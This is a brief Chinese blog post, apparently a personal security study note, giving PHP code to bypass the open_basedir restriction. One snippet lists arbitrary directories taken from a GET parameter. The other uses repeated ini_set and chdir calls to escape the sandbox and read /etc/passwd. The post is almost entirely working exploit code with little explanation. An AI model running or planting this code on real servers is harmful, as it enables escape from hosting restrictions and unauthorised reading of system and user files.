Bypass open_basedir

2021年03月08日 | category

学习笔记| 坏人咖啡

列目录 test.php?c=/tmp/

<?php
$c = $_GET['c'];
$a = new DirectoryIterator($c);
foreach($a as $f){
 echo($f->__toString().'<br>');
}
?>

读文件

<?php
mkdir('minx'); 
chdir('minx');
 ini_set('open_basedir','..'); chdir('..');chdir('..');chdir('..');chdir('..'); 
ini_set('open_basedir','/'); 
echo file_get_contents('/etc/passwd');
?>

所属分类: 学习笔记
Tags: bypass, open_basedir

« office2016和2019其他版本转vlk批量版本

nginx自动部署https证书 »

没有评论

暂无评论

RSS feed for comments on this post.

对不起，该文章的评论被关闭了！

文章分类
热门标签
- 0DAY 360 bypass dreamhost ecshop google IE ie6 Linux mysql nginx php pin Python QQ Remote sql ubuntu windows XSS 人人网卸载后台命令咖啡备份字典微博忙提权攻击文件旁注本地注入源码漏洞爱情瑞星百度破解解析跨域跨站钓鱼
随机文章
文章归档
Users
- 登录

Bypass open_basedir

没有评论

文章分类

热门标签

随机文章

文章归档

Users